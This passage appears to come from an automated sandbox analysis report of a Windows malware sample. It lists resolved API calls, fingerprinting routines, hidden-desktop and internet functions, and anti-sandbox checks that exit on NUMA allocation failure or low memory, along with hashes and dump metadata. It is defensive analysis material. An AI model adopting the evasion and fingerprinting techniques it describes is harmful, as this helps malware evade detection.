                              • GetProcAddress.KERNEL32(734B0000,01445480), ref: 007D6C35
                              • GetProcAddress.KERNEL32(734B0000,0144AE78), ref: 007D6C4E
                              • GetProcAddress.KERNEL32(734B0000,0145CEA8), ref: 007D6C66
                              • GetProcAddress.KERNEL32(734B0000,0145CCF8), ref: 007D6C7E
                              • GetProcAddress.KERNEL32(734B0000,01445260), ref: 007D6C97
                              • GetProcAddress.KERNEL32(734B0000,014452A0), ref: 007D6CAF
                              • GetProcAddress.KERNEL32(734B0000,0145CC20), ref: 007D6CC7
                              • GetProcAddress.KERNEL32(763B0000,01445280), ref: 007D6CE3
                              • GetProcAddress.KERNEL32(763B0000,014452C0), ref: 007D6CFB
                              • GetProcAddress.KERNEL32(763B0000,0145CBD8), ref: 007D6D14
                              • GetProcAddress.KERNEL32(763B0000,0145CC80), ref: 007D6D2C
                              • GetProcAddress.KERNEL32(763B0000,014454E0), ref: 007D6D44
                              • GetProcAddress.KERNEL32(750F0000,0144AEA0), ref: 007D6D64
                              • GetProcAddress.KERNEL32(750F0000,0144B210), ref: 007D6D7C
                              • GetProcAddress.KERNEL32(750F0000,0145CDB8), ref: 007D6D95
                              • GetProcAddress.KERNEL32(750F0000,01445500), ref: 007D6DAD
                              • GetProcAddress.KERNEL32(750F0000,014453A0), ref: 007D6DC5
                              • GetProcAddress.KERNEL32(750F0000,0144B238), ref: 007D6DDE
                              • GetProcAddress.KERNEL32(75A50000,0145CCE0), ref: 007D6DFE
                              • GetProcAddress.KERNEL32(75A50000,014453C0), ref: 007D6E16
                              • GetProcAddress.KERNEL32(75A50000,01458938), ref: 007D6E2F
                              • GetProcAddress.KERNEL32(75A50000,0145CC08), ref: 007D6E47
                              • GetProcAddress.KERNEL32(75A50000,0145CE30), ref: 007D6E5F
                              • GetProcAddress.KERNEL32(75A50000,01445520), ref: 007D6E78
                              • GetProcAddress.KERNEL32(75A50000,014452E0), ref: 007D6E90
                              • GetProcAddress.KERNEL32(75A50000,0145CD58), ref: 007D6EA8
                              • GetProcAddress.KERNEL32(75A50000,0145CE78), ref: 007D6EC1
                              • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 007D6ED7
                              • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 007D6EEE
                              • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 007D6F05
                              • GetProcAddress.KERNEL32(75070000,01445300), ref: 007D6F21
                              • GetProcAddress.KERNEL32(75070000,0145CDA0), ref: 007D6F39
                              • GetProcAddress.KERNEL32(75070000,0145CCB0), ref: 007D6F52
                              • GetProcAddress.KERNEL32(75070000,0145CE18), ref: 007D6F6A
                              • GetProcAddress.KERNEL32(75070000,0145CBF0), ref: 007D6F82
                              • GetProcAddress.KERNEL32(74E50000,014451A0), ref: 007D6F9E
                              • GetProcAddress.KERNEL32(74E50000,01445400), ref: 007D6FB6
                              • GetProcAddress.KERNEL32(75320000,01445320), ref: 007D6FD2
                              • GetProcAddress.KERNEL32(75320000,0145CC68), ref: 007D6FEA
                              • GetProcAddress.KERNEL32(6F060000,01445340), ref: 007D700A
                              • GetProcAddress.KERNEL32(6F060000,01445360), ref: 007D7022
                              • GetProcAddress.KERNEL32(6F060000,01445540), ref: 007D703B
                              • GetProcAddress.KERNEL32(6F060000,0145CDE8), ref: 007D7053
                              • GetProcAddress.KERNEL32(6F060000,014451C0), ref: 007D706B
                              • GetProcAddress.KERNEL32(6F060000,01445420), ref: 007D7084
                              • GetProcAddress.KERNEL32(6F060000,014454A0), ref: 007D709C
                              • GetProcAddress.KERNEL32(6F060000,01445380), ref: 007D70B4
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 007D70CB
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 007D70E2
                              • GetProcAddress.KERNEL32(74E00000,0145CC98), ref: 007D70FE
                              • GetProcAddress.KERNEL32(74E00000,014589B8), ref: 007D7116
                              • GetProcAddress.KERNEL32(74E00000,0145CC38), ref: 007D712F
                              • GetProcAddress.KERNEL32(74E00000,0145CC50), ref: 007D7147
                              • GetProcAddress.KERNEL32(74DF0000,014453E0), ref: 007D7163
                              • GetProcAddress.KERNEL32(6E100000,0145CE00), ref: 007D717F
                              • GetProcAddress.KERNEL32(6E100000,014451E0), ref: 007D7197
                              • GetProcAddress.KERNEL32(6E100000,0145CCC8), ref: 007D71B0
                              • GetProcAddress.KERNEL32(6E100000,0145CD10), ref: 007D71C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                              • API String ID: 2238633743-3468015613
                              • Opcode ID: 0e974a4de164e1c5130ace6a36fc8c8bcdfd2fe8956a7d075f8eabb403bfad24
                              • Instruction ID: a81eda018c2870e5fe5aaa01b80269b990617b77544c0b37c3a84533dbd2f406
                              • Opcode Fuzzy Hash: 0e974a4de164e1c5130ace6a36fc8c8bcdfd2fe8956a7d075f8eabb403bfad24
                              • Instruction Fuzzy Hash: EB6240F563C280AFD754DFA5EDC8A2737B9F7892063508919E9598B360DB34AD00FB60
                              APIs
                              • lstrlen.KERNEL32(007DCFEC), ref: 007CF1D5
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF1F1
                              • lstrlen.KERNEL32(007DCFEC), ref: 007CF1FC
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF215
                              • lstrlen.KERNEL32(007DCFEC), ref: 007CF220
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF239
                              • lstrcpy.KERNEL32(00000000,007E4FA0), ref: 007CF25E
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF28C
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF2C0
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF2F0
                              • lstrlen.KERNEL32(01445160), ref: 007CF315
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: f83ac76cded8b11a04857530ce0793478316b6009be1c99f6ef925ef1f32bfcb
                              • Instruction ID: 246163145322827929b05b1c67845af40699e30d14cecc88dd524f3a0f05403d
                              • Opcode Fuzzy Hash: f83ac76cded8b11a04857530ce0793478316b6009be1c99f6ef925ef1f32bfcb
                              • Instruction Fuzzy Hash: 0FA24A70A15242DFDB24DF65D988B5ABBF6AF44310B19807DE809EB362DB39DC42CB50
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D0013
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D00BD
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D00E1
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D00EC
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D0110
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D011B
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D013F
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D015A
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D0189
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D0194
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D01C3
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D01CE
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D0206
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D0250
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D0288
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D059B
                              • lstrlen.KERNEL32(01444EC0), ref: 007D05AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D05D7
                              • lstrcat.KERNEL32(00000000,?), ref: 007D05E3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D060E
                              • lstrlen.KERNEL32(0145DE10), ref: 007D0625
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D064C
                              • lstrcat.KERNEL32(00000000,?), ref: 007D0658
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D0681
                              • lstrlen.KERNEL32(01444DC0), ref: 007D0698
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D06C9
                              • lstrcat.KERNEL32(00000000,?), ref: 007D06D5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D0706
                              • lstrcpy.KERNEL32(00000000,014589A8), ref: 007D074B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D077F
                              • lstrcpy.KERNEL32(00000000,0145DE70), ref: 007D07E7
                              • lstrcpy.KERNEL32(00000000,014589F8), ref: 007D0858
                              • lstrcpy.KERNEL32(00000000,fplugins), ref: 007D08CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D0928
                              • lstrcpy.KERNEL32(00000000,01458B08), ref: 007D09F8
                                • Part of subcall function 007B24E0: lstrcpy.KERNEL32(00000000,?), ref: 007B2528
                                • Part of subcall function 007B24E0: lstrcpy.KERNEL32(00000000,?), ref: 007B254E
                                • Part of subcall function 007B24E0: lstrcpy.KERNEL32(00000000,?), ref: 007B2577
                              • lstrcpy.KERNEL32(00000000,01458A98), ref: 007D0ACE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D0B81
                              • lstrcpy.KERNEL32(00000000,01458A98), ref: 007D0D58
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID: fplugins
                              • API String ID: 2500673778-38756186
                              • Opcode ID: 31055625510c138967339683d03f4cb56a4d22cf9afd74b530abea0d77edc220
                              • Instruction ID: 69f9ccc9629aa0e35455e304df13661d06ac2446f2a2fc270ffe4c00f5a98777
                              • Opcode Fuzzy Hash: 31055625510c138967339683d03f4cb56a4d22cf9afd74b530abea0d77edc220
                              • Instruction Fuzzy Hash: 74E23A71A05341CFD724DF29C488B5ABBF1BF88314F99856ED48D8B352DB399842CB92
                              APIs
                              • lstrlen.KERNEL32(01445160), ref: 007CF315
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CF3A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CF3C7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CF47B
                              • lstrcpy.KERNEL32(00000000,01445160), ref: 007CF4BB
                              • lstrcpy.KERNEL32(00000000,01458918), ref: 007CF4EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CF59E
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007CF61C
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CF64C
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CF69A
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 007CF718
                              • lstrlen.KERNEL32(014588D8), ref: 007CF746
                              • lstrcpy.KERNEL32(00000000,014588D8), ref: 007CF771
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CF793
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CF7E4
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 007CFA32
                              • lstrlen.KERNEL32(01458858), ref: 007CFA60
                              • lstrcpy.KERNEL32(00000000,01458858), ref: 007CFA8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CFAAD
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CFAFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: 60fa01d3633b4ead2cb7fb007e49f5279c70506e0d33ece20c2eb15d5ba6394b
                              • Instruction ID: f8c4e94bf70fe7d1d823f30dfaa4f6583dc9b91344d8953b0a4c0ec3c73b6933
                              • Opcode Fuzzy Hash: 60fa01d3633b4ead2cb7fb007e49f5279c70506e0d33ece20c2eb15d5ba6394b
                              • Instruction Fuzzy Hash: 80F12B70A15242CFDB24DF69C988B5AB7E6BF44314B19C1BED8099B362D739DC42CB50

                              Control-flow Graph

                              • Graph rendering omitted. Function 007C8CA0 (basic blocks 7c8ca0-7c8eef): repeated StrCmpCA comparisons, lstrlen, lstrcpy, and an ExitProcess block reachable directly from the first StrCmpCA block; subcalls to 007B2A20 and 007B2930.
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 5ba032676d25964216fd1fe7c24dd5afce1495b011f317633f3e1267fc7d13fc
                              • Instruction ID: e276ceb764d37a6bf819bd8ea59349fe1c351797b43a5c89f21bb28f2a17b69b
                              • Opcode Fuzzy Hash: 5ba032676d25964216fd1fe7c24dd5afce1495b011f317633f3e1267fc7d13fc
                              • Instruction Fuzzy Hash: 51516870A19741EBCBA09F76DC88F6B7BF4BB04701B50486DE442D7611DB7CE8429B62

                              Control-flow Graph

                              • Graph rendering omitted. Function 007D2740 (basic blocks 7d2740-7d2872): GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA; subcall to 007D71E0.
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 007D277B
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,007C93B6,00000000,00000000,00000000,00000000), ref: 007D27AC
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007D280F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D2816
                              • wsprintfA.USER32 ref: 007D283B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                              • String ID: :\$C
                              • API String ID: 2572753744-3309953409
                              • Opcode ID: 94d098c2c5f623e057bd8c370ee9124dbfbe3b965c6630fcf1d4f9ac09fcd4cd
                              • Instruction ID: 3130c5dd04443a8b2995503c6bdd13e269fe45551f26f175a6491db16242541f
                              • Opcode Fuzzy Hash: 94d098c2c5f623e057bd8c370ee9124dbfbe3b965c6630fcf1d4f9ac09fcd4cd
                              • Instruction Fuzzy Hash: C2317EB1D08249ABCB14CFB88A859EFFFBCEF58710F10016AE505F7651E6348A418BA1

                              Control-flow Graph

                              • Graph rendering omitted. Function 007B4BC0 (basic blocks 7b4bc0-7b4c48): ??2@YAPAXI@Z (3 calls), lstrlen, InternetCrackUrlA; subcall to 007B2A20.
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 007B4BF7
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007B4C01
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007B4C0B
                              • lstrlen.KERNEL32(?,00000000,?), ref: 007B4C1F
                              • InternetCrackUrlA.WININET(?,00000000), ref: 007B4C27
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??2@$CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1683549937-4251816714
                              • Opcode ID: 6e46b168c5dc592eff8078df0731702407770603fdc9ef2cd9a15ac34eb6c22e
                              • Instruction ID: e6409c5b03776c7cbc8b16c9dfcfef49ad433c4bc45f53890a5697f0816cd443
                              • Opcode Fuzzy Hash: 6e46b168c5dc592eff8078df0731702407770603fdc9ef2cd9a15ac34eb6c22e
                              • Instruction Fuzzy Hash: 88012D71D01218ABDF10DFA8EC45B9EBBB8EB08320F008566F918E7390DB7459058FD4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2459 7b1030-7b1055 GetCurrentProcess VirtualAllocExNuma 2460 7b105e-7b107b VirtualAlloc 2459->2460 2461 7b1057-7b1058 ExitProcess 2459->2461 2462 7b107d-7b1080 2460->2462 2463 7b1082-7b1088 2460->2463 2462->2463 2464 7b108a-7b10ab VirtualFree 2463->2464 2465 7b10b1-7b10b6 2463->2465 2464->2465
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B1046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 007B104D
                              • ExitProcess.KERNEL32 ref: 007B1058
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007B106C
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 007B10AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                              • String ID:
                              • API String ID: 3477276466-0
                              • Opcode ID: 31b5ce8043e60f36519856eab5060e5dfc71133ae2d4ebdfc733bb5550d5e15e
                              • Instruction ID: 389964eb29cdbb08369967642a6c818393c7c74fd1d40d40eb06568b44782599
                              • Opcode Fuzzy Hash: 31b5ce8043e60f36519856eab5060e5dfc71133ae2d4ebdfc733bb5550d5e15e
                              • Instruction Fuzzy Hash: 750149713442447BE7205B656C9DF9B77ACE740B02F604414F704EB2C0D971ED009564

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2466 7cee90-7ceeb5 call 7b2930 2469 7ceec9-7ceecd call 7b6c40 2466->2469 2470 7ceeb7-7ceebf 2466->2470 2473 7ceed2-7ceee8 StrCmpCA 2469->2473 2470->2469 2471 7ceec1-7ceec3 lstrcpy 2470->2471 2471->2469 2474 7ceeea-7cef02 call 7b2a20 call 7b2930 2473->2474 2475 7cef11-7cef18 call 7b2a20 2473->2475 2484 7cef04-7cef0c 2474->2484 2485 7cef45-7cefa0 call 7b2a20 * 10 2474->2485 2481 7cef20-7cef28 2475->2481 2481->2481 2483 7cef2a-7cef37 call 7b2930 2481->2483 2483->2485 2492 7cef39 2483->2492 2484->2485 2488 7cef0e-7cef0f 2484->2488 2491 7cef3e-7cef3f lstrcpy 2488->2491 2491->2485 2492->2491
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CEEC3
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 007CEEDE
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 007CEF3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: ERROR
                              • API String ID: 3722407311-2861137601
                              • Opcode ID: 9a300a79ce76f36765af4b9e9e8c21a029aec1d74a3c782b750b43e34e68df02
                              • Instruction ID: df3d9356f4eca90fabe3f1d9947dc4db00a75aca862b7f55f5237581c9c6609b
                              • Opcode Fuzzy Hash: 9a300a79ce76f36765af4b9e9e8c21a029aec1d74a3c782b750b43e34e68df02
                              • Instruction Fuzzy Hash: 38210E70626246DBDB61FF79DC4ABDA37A4AF14300F04942CBC4AEB253DA38EC018790

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2547 7b10c0-7b10cb 2548 7b10d0-7b10dc 2547->2548 2550 7b10de-7b10f3 GlobalMemoryStatusEx 2548->2550 2551 7b1112-7b1114 ExitProcess 2550->2551 2552 7b10f5-7b1106 2550->2552 2553 7b111a-7b111d 2552->2553 2554 7b1108 2552->2554 2554->2551 2555 7b110a-7b1110 2554->2555 2555->2551 2555->2553
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: c684ce56c5e9e8974add5b49182b4cb71d3b78d15dddb1ba33ed01e24173847c
                              • Instruction ID: 8085f306b664a3cc63e317abea8fd7d678cba3bd500e7f42c080f572f007f6f1
                              • Opcode Fuzzy Hash: c684ce56c5e9e8974add5b49182b4cb71d3b78d15dddb1ba33ed01e24173847c
                              • Instruction Fuzzy Hash: F2F05C7011C28C4BEB10BA6CDC6A3ADF7D8EB01350FE00929DE9BC2182F238CC509127

                              Control-flow Graph

                              • Executed
                              • Not Executed
